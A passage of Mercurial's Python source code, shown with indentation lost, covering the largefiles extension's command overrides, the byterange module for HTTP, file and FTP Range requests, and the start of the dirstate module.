'the update flag\n')
del opts['rebase']
cmdutil.bailifchanged(repo)
origpostincoming = commands.postincoming
def _dummy(*args, **kwargs):
pass
commands.postincoming = _dummy
try:
result = commands.pull(ui, repo, source, **opts)
finally:
commands.postincoming = origpostincoming
revspostpull = len(repo)
if revspostpull > revsprepull:
result = result or rebase.rebase(ui, repo)
finally:
repo._isrebasing = False
else:
result = orig(ui, repo, source, **opts)
revspostpull = len(repo)
lfrevs = opts.get('lfrev', [])
if opts.get('all_largefiles'):
lfrevs.append('pulled()')
if lfrevs and revspostpull > revsprepull:
numcached = 0
repo.firstpulled = revsprepull # for pulled() revset expression
try:
for rev in scmutil.revrange(repo, lfrevs):
ui.note(_('pulling largefiles for revision %s\n') % rev)
(cached, missing) = lfcommands.cachelfiles(ui, repo, rev)
numcached += len(cached)
finally:
del repo.firstpulled
ui.status(_("%d largefiles cached\n") % numcached)
return result
def pulledrevsetsymbol(repo, subset, x):
"""``pulled()``
Changesets that just has been pulled.
Only available with largefiles from pull --lfrev expressions.
.. container:: verbose
Some examples:
- pull largefiles for all new changesets::
hg pull -lfrev "pulled()"
- pull largefiles for all new branch heads::
hg pull -lfrev "head(pulled()) and not closed()"
"""
try:
firstpulled = repo.firstpulled
except AttributeError:
raise util.Abort(_("pulled() only available in --lfrev"))
return [r for r in subset if r >= firstpulled]
def overrideclone(orig, ui, source, dest=None, **opts):
d = dest
if d is None:
d = hg.defaultdest(source)
if opts.get('all_largefiles') and not hg.islocal(d):
raise util.Abort(_(
'--all-largefiles is incompatible with non-local destination %s' %
d))
return orig(ui, source, dest, **opts)
def hgclone(orig, ui, opts, *args, **kwargs):
result = orig(ui, opts, *args, **kwargs)
if result is not None:
sourcerepo, destrepo = result
repo = destrepo.local()
# Caching is implicitly limited to 'rev' option, since the dest repo was
# truncated at that point. The user may expect a download count with
# this option, so attempt whether or not this is a largefile repo.
if opts.get('all_largefiles'):
success, missing = lfcommands.downloadlfiles(ui, repo, None)
if missing != 0:
return None
return result
def overriderebase(orig, ui, repo, **opts):
repo._isrebasing = True
try:
return orig(ui, repo, **opts)
finally:
repo._isrebasing = False
def overridearchive(orig, repo, dest, node, kind, decode=True, matchfn=None,
prefix=None, mtime=None, subrepos=None):
# No need to lock because we are only reading history and
# largefile caches, neither of which are modified.
lfcommands.cachelfiles(repo.ui, repo, node)
if kind not in archival.archivers:
raise util.Abort(_("unknown archive type '%s'") % kind)
ctx = repo[node]
if kind == 'files':
if prefix:
raise util.Abort(
_('cannot give prefix when archiving to files'))
else:
prefix = archival.tidyprefix(dest, kind, prefix)
def write(name, mode, islink, getdata):
if matchfn and not matchfn(name):
return
data = getdata()
if decode:
data = repo.wwritedata(name, data)
archiver.addfile(prefix + name, mode, islink, data)
archiver = archival.archivers[kind](dest, mtime or ctx.date()[0])
if repo.ui.configbool("ui", "archivemeta", True):
def metadata():
base = 'repo: %s\nnode: %s\nbranch: %s\n' % (
hex(repo.changelog.node(0)), hex(node), ctx.branch())
tags = ''.join('tag: %s\n' % t for t in ctx.tags()
if repo.tagtype(t) == 'global')
if not tags:
repo.ui.pushbuffer()
opts = {'template': '{latesttag}\n{latesttagdistance}',
'style': '', 'patch': None, 'git': None}
cmdutil.show_changeset(repo.ui, repo, opts).show(ctx)
ltags, dist = repo.ui.popbuffer().split('\n')
tags = ''.join('latesttag: %s\n' % t for t in ltags.split(':'))
tags += 'latesttagdistance: %s\n' % dist
return base + tags
write('.hg_archival.txt', 0644, False, metadata)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(path, 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
if subrepos:
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, matchfn)
sub.archive(repo.ui, archiver, prefix, submatch)
archiver.done()
def hgsubrepoarchive(orig, repo, ui, archiver, prefix, match=None):
repo._get(repo._state + ('hg',))
rev = repo._state[1]
ctx = repo._repo[rev]
lfcommands.cachelfiles(ui, repo._repo, ctx.node())
def write(name, mode, islink, getdata):
# At this point, the standin has been replaced with the largefile name,
# so the normal matcher works here without the lfutil variants.
if match and not match(f):
return
data = getdata()
archiver.addfile(prefix + repo._path + '/' + name, mode, islink, data)
for f in ctx:
ff = ctx.flags(f)
getdata = ctx[f].data
if lfutil.isstandin(f):
path = lfutil.findfile(repo._repo, getdata().strip())
if path is None:
raise util.Abort(
_('largefile %s not found in repo store or system cache')
% lfutil.splitstandin(f))
f = lfutil.splitstandin(f)
def getdatafn():
fd = None
try:
fd = open(os.path.join(prefix, path), 'rb')
return fd.read()
finally:
if fd:
fd.close()
getdata = getdatafn
write(f, 'x' in ff and 0755 or 0644, 'l' in ff, getdata)
for subpath in sorted(ctx.substate):
sub = ctx.sub(subpath)
submatch = match_.narrowmatcher(subpath, match)
sub.archive(ui, archiver, os.path.join(prefix, repo._path) + '/',
submatch)
# If a largefile is modified, the change is not reflected in its
# standin until a commit. cmdutil.bailifchanged() raises an exception
# if the repo has uncommitted changes. Wrap it to also check if
# largefiles were changed. This is used by bisect and backout.
def overridebailifchanged(orig, repo):
orig(repo)
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
# Fetch doesn't use cmdutil.bailifchanged so override it to add the check
def overridefetch(orig, ui, repo, *pats, **opts):
repo.lfstatus = True
modified, added, removed, deleted = repo.status()[:4]
repo.lfstatus = False
if modified or added or removed or deleted:
raise util.Abort(_('outstanding uncommitted changes'))
return orig(ui, repo, *pats, **opts)
def overrideforget(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
forget = sorted(s[0] + s[1] + s[3] + s[6])
forget = [f for f in forget if lfutil.standin(f) in repo[None].manifest()]
for f in forget:
if lfutil.standin(f) not in repo.dirstate and not \
os.path.isdir(m.rel(lfutil.standin(f))):
ui.warn(_('not removing %s: file is already untracked\n')
% m.rel(f))
result = 1
for f in forget:
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in forget:
if lfdirstate[f] == 'a':
lfdirstate.drop(f)
else:
lfdirstate.remove(f)
lfdirstate.write()
standins = [lfutil.standin(f) for f in forget]
for f in standins:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(standins)
finally:
wlock.release()
return result
def getoutgoinglfiles(ui, repo, dest=None, **opts):
dest = ui.expandpath(dest or 'default-push', dest or 'default')
dest, branches = hg.parseurl(dest, opts.get('branch'))
revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get('rev'))
if revs:
revs = [repo.lookup(rev) for rev in scmutil.revrange(repo, revs)]
try:
remote = hg.peer(repo, opts, dest)
except error.RepoError:
return None
outgoing = discovery.findcommonoutgoing(repo, remote.peer(), force=False)
if not outgoing.missing:
return outgoing.missing
o = repo.changelog.nodesbetween(outgoing.missing, revs)[0]
if opts.get('newest_first'):
o.reverse()
toupload = set()
for n in o:
parents = [p for p in repo.changelog.parents(n) if p != node.nullid]
ctx = repo[n]
files = set(ctx.files())
if len(parents) == 2:
mc = ctx.manifest()
mp1 = ctx.parents()[0].manifest()
mp2 = ctx.parents()[1].manifest()
for f in mp1:
if f not in mc:
files.add(f)
for f in mp2:
if f not in mc:
files.add(f)
for f in mc:
if mc[f] != mp1.get(f, None) or mc[f] != mp2.get(f, None):
files.add(f)
toupload = toupload.union(
set([f for f in files if lfutil.isstandin(f) and f in ctx]))
return sorted(toupload)
def overrideoutgoing(orig, ui, repo, dest=None, **opts):
result = orig(ui, repo, dest, **opts)
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, dest, **opts)
if toupload is None:
ui.status(_('largefiles: No remote repo\n'))
elif not toupload:
ui.status(_('largefiles: no files to upload\n'))
else:
ui.status(_('largefiles to upload:\n'))
for file in toupload:
ui.status(lfutil.splitstandin(file) + '\n')
ui.status('\n')
return result
def overridesummary(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
if opts.pop('large', None):
toupload = getoutgoinglfiles(ui, repo, None, **opts)
if toupload is None:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no remote repo)\n'))
elif not toupload:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: (no files to upload)\n'))
else:
# i18n: column positioning for "hg summary"
ui.status(_('largefiles: %d to upload\n') % len(toupload))
def scmutiladdremove(orig, repo, pats=[], opts={}, dry_run=None,
similarity=None):
if not lfutil.islfilesrepo(repo):
return orig(repo, pats, opts, dry_run, similarity)
# Get the list of missing largefiles so we can remove them
lfdirstate = lfutil.openlfdirstate(repo.ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
# Call into the normal remove code, but the removing of the standin, we want
# to have handled by original addremove. Monkey patching here makes sure
# we don't remove the standin in the largefiles code, preventing a very
# confused state later.
if missing:
m = [repo.wjoin(f) for f in missing]
repo._isaddremove = True
removelargefiles(repo.ui, repo, *m, **opts)
repo._isaddremove = False
# Call into the normal add code, and any files that *should* be added as
# largefiles will be
addlargefiles(repo.ui, repo, *pats, **opts)
# Now that we've handled largefiles, hand off to the original addremove
# function to take care of the rest. Make sure it doesn't do anything with
# largefiles by installing a matcher that will ignore them.
installnormalfilesmatchfn(repo[None].manifest())
result = orig(repo, pats, opts, dry_run, similarity)
restorematchfn()
return result
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
def overridepurge(orig, ui, repo, *dirs, **opts):
# XXX large file status is buggy when used on repo proxy.
# XXX this needs to be investigate.
repo = repo.unfiltered()
oldstatus = repo.status
def overridestatus(node1='.', node2=None, match=None, ignored=False,
clean=False, unknown=False, listsubrepos=False):
r = oldstatus(node1, node2, match, ignored, clean, unknown,
listsubrepos)
lfdirstate = lfutil.openlfdirstate(ui, repo)
modified, added, removed, deleted, unknown, ignored, clean = r
unknown = [f for f in unknown if lfdirstate[f] == '?']
ignored = [f for f in ignored if lfdirstate[f] == '?']
return modified, added, removed, deleted, unknown, ignored, clean
repo.status = overridestatus
orig(ui, repo, *dirs, **opts)
repo.status = oldstatus
def overriderollback(orig, ui, repo, **opts):
result = orig(ui, repo, **opts)
merge.update(repo, node=None, branchmerge=False, force=True,
partial=lfutil.isstandin)
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
lfiles = lfutil.listlfiles(repo)
oldlfiles = lfutil.listlfiles(repo, repo[None].parents()[0].rev())
for file in lfiles:
if file in oldlfiles:
lfdirstate.normallookup(file)
else:
lfdirstate.add(file)
lfdirstate.write()
finally:
wlock.release()
return result
def overridetransplant(orig, ui, repo, *revs, **opts):
try:
oldstandins = lfutil.getstandinsstate(repo)
repo._istransplanting = True
result = orig(ui, repo, *revs, **opts)
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist,
printmessage=True)
finally:
repo._istransplanting = False
return result
def overridecat(orig, ui, repo, file1, *pats, **opts):
ctx = scmutil.revsingle(repo, opts.get('rev'))
err = 1
notbad = set()
m = scmutil.match(ctx, (file1,) + pats, opts)
origmatchfn = m.matchfn
def lfmatchfn(f):
lf = lfutil.splitstandin(f)
if lf is None:
return origmatchfn(f)
notbad.add(lf)
return origmatchfn(lf)
m.matchfn = lfmatchfn
origbadfn = m.bad
def lfbadfn(f, msg):
if not f in notbad:
return origbadfn(f, msg)
m.bad = lfbadfn
for f in ctx.walk(m):
fp = cmdutil.makefileobj(repo, opts.get('output'), ctx.node(),
pathname=f)
lf = lfutil.splitstandin(f)
if lf is None:
# duplicating unreachable code from commands.cat
data = ctx[f].data()
if opts.get('decode'):
data = repo.wwritedata(f, data)
fp.write(data)
else:
hash = lfutil.readstandin(repo, lf, ctx.rev())
if not lfutil.inusercache(repo.ui, hash):
store = basestore._openstore(repo)
success, missing = store.get([(lf, hash)])
if len(success) != 1:
raise util.Abort(
_('largefile %s is not in cache and could not be '
'downloaded') % lf)
path = lfutil.usercachepath(repo.ui, hash)
fpin = open(path, "rb")
for chunk in util.filechunkiter(fpin, 128 * 1024):
fp.write(chunk)
fpin.close()
fp.close()
err = 0
return err
def mercurialsinkbefore(orig, sink):
sink.repo._isconverting = True
orig(sink)
def mercurialsinkafter(orig, sink):
sink.repo._isconverting = False
orig(sink)
```
#### File: bin/mercurial/byterange.py
```python
import os
import stat
import urllib
import urllib2
import email.Utils
class RangeError(IOError):
"""Error raised when an unsatisfiable range is requested."""
pass
class HTTPRangeHandler(urllib2.BaseHandler):
"""Handler that enables HTTP Range headers.
This was extremely simple. The Range header is a HTTP feature to
begin with so all this class does is tell urllib2 that the
"206 Partial Content" response from the HTTP server is what we
expected.
Example:
import urllib2
import byterange
range_handler = range.HTTPRangeHandler()
opener = urllib2.build_opener(range_handler)
# install it
urllib2.install_opener(opener)
# create Request and set Range header
req = urllib2.Request('http://www.python.org/')
req.header['Range'] = 'bytes=30-50'
f = urllib2.urlopen(req)
"""
def http_error_206(self, req, fp, code, msg, hdrs):
# 206 Partial Content Response
r = urllib.addinfourl(fp, hdrs, req.get_full_url())
r.code = code
r.msg = msg
return r
def http_error_416(self, req, fp, code, msg, hdrs):
# HTTP's Range Not Satisfiable error
raise RangeError('Requested Range Not Satisfiable')
class RangeableFileObject(object):
"""File object wrapper to enable raw range handling.
This was implemented primarily for handling range
specifications for file:// urls. This object effectively makes
a file object look like it consists only of a range of bytes in
the stream.
Examples:
# expose 10 bytes, starting at byte position 20, from
# /etc/aliases.
>>> fo = RangeableFileObject(file('/etc/passwd', 'r'), (20,30))
# seek seeks within the range (to position 23 in this case)
>>> fo.seek(3)
# tell tells where your at _within the range_ (position 3 in
# this case)
>>> fo.tell()
# read EOFs if an attempt is made to read past the last
# byte in the range. the following will return only 7 bytes.
>>> fo.read(30)
"""
def __init__(self, fo, rangetup):
"""Create a RangeableFileObject.
fo -- a file like object. only the read() method need be
supported but supporting an optimized seek() is
preferable.
rangetup -- a (firstbyte,lastbyte) tuple specifying the range
to work over.
The file object provided is assumed to be at byte offset 0.
"""
self.fo = fo
(self.firstbyte, self.lastbyte) = range_tuple_normalize(rangetup)
self.realpos = 0
self._do_seek(self.firstbyte)
def __getattr__(self, name):
"""This effectively allows us to wrap at the instance level.
Any attribute not found in _this_ object will be searched for
in self.fo. This includes methods."""
return getattr(self.fo, name)
def tell(self):
"""Return the position within the range.
This is different from fo.seek in that position 0 is the
first byte position of the range tuple. For example, if
this object was created with a range tuple of (500,899),
tell() will return 0 when at byte position 500 of the file.
"""
return (self.realpos - self.firstbyte)
def seek(self, offset, whence=0):
"""Seek within the byte range.
Positioning is identical to that described under tell().
"""
assert whence in (0, 1, 2)
if whence == 0: # absolute seek
realoffset = self.firstbyte + offset
elif whence == 1: # relative seek
realoffset = self.realpos + offset
elif whence == 2: # absolute from end of file
# XXX: are we raising the right Error here?
raise IOError('seek from end of file not supported.')
# do not allow seek past lastbyte in range
if self.lastbyte and (realoffset >= self.lastbyte):
realoffset = self.lastbyte
self._do_seek(realoffset - self.realpos)
def read(self, size=-1):
"""Read within the range.
This method will limit the size read based on the range.
"""
size = self._calc_read_size(size)
rslt = self.fo.read(size)
self.realpos += len(rslt)
return rslt
def readline(self, size=-1):
"""Read lines within the range.
This method will limit the size read based on the range.
"""
size = self._calc_read_size(size)
rslt = self.fo.readline(size)
self.realpos += len(rslt)
return rslt
def _calc_read_size(self, size):
"""Handles calculating the amount of data to read based on
the range.
"""
if self.lastbyte:
if size > -1:
if ((self.realpos + size) >= self.lastbyte):
size = (self.lastbyte - self.realpos)
else:
size = (self.lastbyte - self.realpos)
return size
def _do_seek(self, offset):
"""Seek based on whether wrapped object supports seek().
offset is relative to the current position (self.realpos).
"""
assert offset >= 0
seek = getattr(self.fo, 'seek', self._poor_mans_seek)
seek(self.realpos + offset)
self.realpos += offset
def _poor_mans_seek(self, offset):
"""Seek by calling the wrapped file objects read() method.
This is used for file like objects that do not have native
seek support. The wrapped objects read() method is called
to manually seek to the desired position.
offset -- read this number of bytes from the wrapped
file object.
raise RangeError if we encounter EOF before reaching the
specified offset.
"""
pos = 0
bufsize = 1024
while pos < offset:
if (pos + bufsize) > offset:
bufsize = offset - pos
buf = self.fo.read(bufsize)
if len(buf) != bufsize:
raise RangeError('Requested Range Not Satisfiable')
pos += bufsize
class FileRangeHandler(urllib2.FileHandler):
"""FileHandler subclass that adds Range support.
This class handles Range headers exactly like an HTTP
server would.
"""
def open_local_file(self, req):
import mimetypes
import email
host = req.get_host()
file = req.get_selector()
localfile = urllib.url2pathname(file)
stats = os.stat(localfile)
size = stats[stat.ST_SIZE]
modified = email.Utils.formatdate(stats[stat.ST_MTIME])
mtype = mimetypes.guess_type(file)[0]
if host:
host, port = urllib.splitport(host)
if port or socket.gethostbyname(host) not in self.get_names():
raise urllib2.URLError('file not on local host')
fo = open(localfile,'rb')
brange = req.headers.get('Range', None)
brange = range_header_to_tuple(brange)
assert brange != ()
if brange:
(fb, lb) = brange
if lb == '':
lb = size
if fb < 0 or fb > size or lb > size:
raise RangeError('Requested Range Not Satisfiable')
size = (lb - fb)
fo = RangeableFileObject(fo, (fb, lb))
headers = email.message_from_string(
'Content-Type: %s\nContent-Length: %d\nLast-Modified: %s\n' %
(mtype or 'text/plain', size, modified))
return urllib.addinfourl(fo, headers, 'file:'+file)
# FTP Range Support
# Unfortunately, a large amount of base FTP code had to be copied
# from urllib and urllib2 in order to insert the FTP REST command.
# Code modifications for range support have been commented as
# follows:
# -- range support modifications start/end here
from urllib import splitport, splituser, splitpasswd, splitattr, \
unquote, addclosehook, addinfourl
import ftplib
import socket
import mimetypes
import email
class FTPRangeHandler(urllib2.FTPHandler):
def ftp_open(self, req):
host = req.get_host()
if not host:
raise IOError('ftp error', 'no host given')
host, port = splitport(host)
if port is None:
port = ftplib.FTP_PORT
else:
port = int(port)
# username/password handling
user, host = splituser(host)
if user:
user, passwd = splitpasswd(user)
else:
passwd = None
host = unquote(host)
user = unquote(user or '')
passwd = unquote(passwd or '')
try:
host = socket.gethostbyname(host)
except socket.error, msg:
raise urllib2.URLError(msg)
path, attrs = splitattr(req.get_selector())
dirs = path.split('/')
dirs = map(unquote, dirs)
dirs, file = dirs[:-1], dirs[-1]
if dirs and not dirs[0]:
dirs = dirs[1:]
try:
fw = self.connect_ftp(user, passwd, host, port, dirs)
type = file and 'I' or 'D'
for attr in attrs:
attr, value = splitattr(attr)
if attr.lower() == 'type' and \
value in ('a', 'A', 'i', 'I', 'd', 'D'):
type = value.upper()
# -- range support modifications start here
rest = None
range_tup = range_header_to_tuple(req.headers.get('Range', None))
assert range_tup != ()
if range_tup:
(fb, lb) = range_tup
if fb > 0:
rest = fb
# -- range support modifications end here
fp, retrlen = fw.retrfile(file, type, rest)
# -- range support modifications start here
if range_tup:
(fb, lb) = range_tup
if lb == '':
if retrlen is None or retrlen == 0:
raise RangeError('Requested Range Not Satisfiable due'
' to unobtainable file length.')
lb = retrlen
retrlen = lb - fb
if retrlen < 0:
# beginning of range is larger than file
raise RangeError('Requested Range Not Satisfiable')
else:
retrlen = lb - fb
fp = RangeableFileObject(fp, (0, retrlen))
# -- range support modifications end here
headers = ""
mtype = mimetypes.guess_type(req.get_full_url())[0]
if mtype:
headers += "Content-Type: %s\n" % mtype
if retrlen is not None and retrlen >= 0:
headers += "Content-Length: %d\n" % retrlen
headers = email.message_from_string(headers)
return addinfourl(fp, headers, req.get_full_url())
except ftplib.all_errors, msg:
raise IOError('ftp error', msg)
def connect_ftp(self, user, passwd, host, port, dirs):
fw = ftpwrapper(user, passwd, host, port, dirs)
return fw
class ftpwrapper(urllib.ftpwrapper):
# range support note:
# this ftpwrapper code is copied directly from
# urllib. The only enhancement is to add the rest
# argument and pass it on to ftp.ntransfercmd
def retrfile(self, file, type, rest=None):
self.endtransfer()
if type in ('d', 'D'):
cmd = 'TYPE A'
isdir = 1
else:
cmd = 'TYPE ' + type
isdir = 0
try:
self.ftp.voidcmd(cmd)
except ftplib.all_errors:
self.init()
self.ftp.voidcmd(cmd)
conn = None
if file and not isdir:
# Use nlst to see if the file exists at all
try:
self.ftp.nlst(file)
except ftplib.error_perm, reason:
raise IOError('ftp error', reason)
# Restore the transfer mode!
self.ftp.voidcmd(cmd)
# Try to retrieve as a file
try:
cmd = 'RETR ' + file
conn = self.ftp.ntransfercmd(cmd, rest)
except ftplib.error_perm, reason:
if str(reason).startswith('501'):
# workaround for REST not supported error
fp, retrlen = self.retrfile(file, type)
fp = RangeableFileObject(fp, (rest,''))
return (fp, retrlen)
elif not str(reason).startswith('550'):
raise IOError('ftp error', reason)
if not conn:
# Set transfer mode to ASCII!
self.ftp.voidcmd('TYPE A')
# Try a directory listing
if file:
cmd = 'LIST ' + file
else:
cmd = 'LIST'
conn = self.ftp.ntransfercmd(cmd)
self.busy = 1
# Pass back both a suitably decorated object and a retrieval length
return (addclosehook(conn[0].makefile('rb'),
self.endtransfer), conn[1])
####################################################################
# Range Tuple Functions
# XXX: These range tuple functions might go better in a class.
_rangere = None
def range_header_to_tuple(range_header):
"""Get a (firstbyte,lastbyte) tuple from a Range header value.
Range headers have the form "bytes=<firstbyte>-<lastbyte>". This
function pulls the firstbyte and lastbyte values and returns
a (firstbyte,lastbyte) tuple. If lastbyte is not specified in
the header value, it is returned as an empty string in the
tuple.
Return None if range_header is None
Return () if range_header does not conform to the range spec
pattern.
"""
global _rangere
if range_header is None:
return None
if _rangere is None:
import re
_rangere = re.compile(r'^bytes=(\d{1,})-(\d*)')
match = _rangere.match(range_header)
if match:
tup = range_tuple_normalize(match.group(1, 2))
if tup and tup[1]:
tup = (tup[0], tup[1]+1)
return tup
return ()
def range_tuple_to_header(range_tup):
"""Convert a range tuple to a Range header value.
Return a string of the form "bytes=<firstbyte>-<lastbyte>" or None
if no range is needed.
"""
if range_tup is None:
return None
range_tup = range_tuple_normalize(range_tup)
if range_tup:
if range_tup[1]:
range_tup = (range_tup[0], range_tup[1] - 1)
return 'bytes=%s-%s' % range_tup
def range_tuple_normalize(range_tup):
"""Normalize a (first_byte,last_byte) range tuple.
Return a tuple whose first element is guaranteed to be an int
and whose second element will be '' (meaning: the last byte) or
an int. Finally, return None if the normalized tuple == (0,'')
as that is equivalent to retrieving the entire file.
"""
if range_tup is None:
return None
# handle first byte
fb = range_tup[0]
if fb in (None, ''):
fb = 0
else:
fb = int(fb)
# handle last byte
try:
lb = range_tup[1]
except IndexError:
lb = ''
else:
if lb is None:
lb = ''
elif lb != '':
lb = int(lb)
# check if range is over the entire file
if (fb, lb) == (0, ''):
return None
# check that the range is valid
if lb < fb:
raise RangeError('Invalid byte range: %s-%s' % (fb, lb))
return (fb, lb)
```
#### File: bin/mercurial/dirstate.py
```python
import errno
from node import nullid
from i18n import _
import scmutil, util, ignore, osutil, parsers, encoding
import os, stat, errno, gc
propertycache = util.propertycache
filecache = scmutil.filecache
_rangemask = 0x7fffffff
class repocache(filecache):
"""filecache for files in .hg/"""
def join(self, obj, fname):
return obj._opener.join(fname)
class rootcache(filecache):
"""filecache for files in the repository root"""
def join(self, obj, fname):
return obj._join(fname)
class dirstate(object):
def __init__(self, opener, ui, root, validate):
'''Create a new dirstate object.
opener is an open()-like callable that can be used to open the
dirstate file; root is the root of the directory tracked by
the dirstate.
'''
self._opener = opener
self._validate = validate
self._root = root
self._rootdir = os.path.join(root, '')
self._dirty = False
self._dirtypl = False
self._lastnormaltime = 0
self._ui = ui
self._filecache = {}
@propertycache
def _map(self):
'''Return the dirstate contents as a map from filename to
(state, mode, size, time).'''
self._read()
return self._map
@propertycache
def _copymap(self):
self._read()
return self._copymap
@propertycache
def _foldmap(self):
f = {}
for name, s in self._map.iteritems():
if s[0] != 'r':
f[util.normcase(name)] = name
for name in self._dirs:
f[util.normcase(name)] = name
f['.'] = '.' # prevents useless util.fspath() invocation
return f
@repocache('branch')
def _branch(self):
try:
return self._opener.read("branch").strip() or "default"
except IOError, inst:
if inst.errno != errno.ENOENT:
raise
return "default"
@propertycache
def _pl(self):
try:
fp = self._opener("dirstate")
st = fp.read(40)
fp.close()
l = len(st)
if l == 40:
return st[:20], st[20:40]
elif l > 0 and l < 40:
raise util.Abort(_('working directory state appears damaged!'))
except IOError, err:
if err.errno != errno.ENOENT:
raise
return [nullid, nullid]
@propertycache
def _dirs(self):
return scmutil.dirs(self._map, 'r')
def dirs(self):
return self._dirs
@rootcache('.hgignore')
def _ignore(self):
files = [self._join('.hgignore')]
for name, path in self._ui.configitems("ui"):
if name == 'ignore' or name.startswith('ignore.'):
files.append(util.expandpath(path))
return ignore.ignore(self._root, files, self._ui.warn)
@propertycache
def _slash(self):
return self._ui.configbool('ui', 'slash') and os.sep != '/'
@propertycache
def _checklink(self):
return util.checklink(self._root)
@propertycache
def _checkexec(self):
return util.checkexec(self._root)
@propertycache
def _checkcase(self):
return not util.checkcase(self._join('.hg'))
def _join(self, f):
# much faster than os.path.join()
# it's safe because f is always a relative path
return self._rootdir + f
def flagfunc(self, buildfallback):
if self._checklink and self._checkexec:
def f(x):
try:
st = os.lstat(self._join(x))
if util.statislink(st):
return 'l'
if util.statisexec(st):
return 'x'
except OSError:
pass
return ''
return f
fallback = buildfallback()
if self._checklink:
def f(x):
if os.path.islink(self._join(x)):
return 'l'
if 'x' in fallback(x):
return 'x'
return ''
return f
if self._checkexec:
def f(x):
if 'l' in fallback(x):
return 'l'
if util.isexec(self._join(x)):
return 'x'
return ''
return f
else:
return fallback
def getcwd(self):
cwd = os.getcwd()
if cwd == self._root:
return ''
# self._root ends with a path separator if self._root is '/' or 'C:\'
rootsep = self._root
if not util.endswithsep(rootsep):
rootsep += os.sep
if cwd.startswith(rootsep):
return cwd[len(rootsep):]
else:
# we're outside the repo. return an absolute path.
return cwd
def pathto(self, f, cwd=None):
if cwd is None:
cwd = self.getcwd()
path = util.pathto(self._root, cwd, f)
if self._slash:
return util.pconvert(path)
return path
def __getitem__(self, key):
'''Return the current state of key (a filename) in the dirstate.
States are:
n normal
m needs merging
r marked for removal
a marked for addition
? not tracked
'''
return self._map.get(key, ("?",))[0]
def __contains__(self, key):
return key in self._map
def __iter__(self):
for x in sorted(self._map):
yield x
def iteritems(self):
return self._map.iteritems()
def parents(self):
return [self._validate(p) for p in self._pl]
def p1(self):
return self._validate(self._pl[0])
def p2(self):
return self._validate(self._pl[1])
def branch(self):
return encoding.tolocal(self._branch)
def setparents(self, p1, p2=nullid):
"""Set dirstate parents to p1 and p2.
When moving from two parents to one, 'm' merged entries a
adjusted to normal and previous copy records discarded and
returned by the call.
See localrepo.setparents()
"""
self._dirty = self._dirtypl = True
oldp2 = self._pl[1]
self._pl = p1, p2
copies = {}
if oldp2 != nullid and p2 == nullid:
# Discard 'm' markers when moving away from a merge state
for f, s in self._map.iteritems():
if s[0] == 'm':
if f in self._copymap:
copies[f] = self._copymap[f]
self.normallookup(f)
return copies
def setbranch(self, branch):
self._branch = encoding.fromlocal(branch)
f = self._opener('branch', 'w', atomictemp=True)
try:
f.write(self._branch + '\n')
f.close()
# make sure filecache has the correct stat info for _branch after
# replacing the underlying file
ce = self._filecache['_branch']
if ce:
ce.refresh()
except: # re-raises
f.discard()
raise
def _read(self):
self._map = {}
self._copymap = {}
try:
st = self._opener.read("dirstate")
except IOError, err:
if err.errno != errno.ENOENT:
raise
return
if not st:
return
# Python's garbage collector triggers a GC each time a certain number
# of container objects (the number being defined by
# gc.get_threshold()) are allocated. parse_dirstate creates a tuple
# for each file in the dirstate. The C version then immediately marks
# them as not to be tracked by the collector. However, this has no
# effect on when GCs are triggered, only on what objects the GC looks
# into. This means that O(number of files) GCs are unavoidable.
# Depending on when in the process's lifetime the dirstate is parsed,
# this can get very expensive. As a workaround, disable GC while
# parsing the dirstate.
gcenabled = gc.isenabled()
gc.disable()
try:
p = parsers.parse_dirstate(self._map, self._copymap, st)
finally:
if gcenabled:
gc.enable()
if not self._dirtypl:
self._pl = p
def invalidate(self):
for a in ("_map", "_copymap", "_foldmap", "_branch", "_pl", "_dirs",
"_ignore"):
if a in self.__dict__:
delattr(self, a)
self._lastnormaltime = 0
self._dirty = False
def copy(self, source, dest):
"""Mark dest as a copy of source. Unmark dest if source is None."""
if source == dest:
return
self._dirty = True
if source is not None:
self._copymap[dest] = source
elif dest in self._copymap:
del self._copymap[dest]
def copied(self, file):
return self._copymap.get(file, None)
def copies(self):
return self._copymap
def _droppath(self, f):
if self[f] not in "?r" and "_dirs" in self.__dict__:
self._dirs.delpath(f)
def _addpath(self, f, state, mode, size, mtime):
oldstate = self[f]
if state == 'a' or oldstate == 'r':
scmutil.checkfilename(f)
if f in self._dirs:
raise util.Abort(_('directory %r already in dirstate') % f)
# shadows
for d in scmutil.finddirs(f):
if d in self._dirs:
break
if d in self._map and self[d] != 'r':
raise util.Abort(
_('file %r in dirstate clashes with %r') % (d, f))
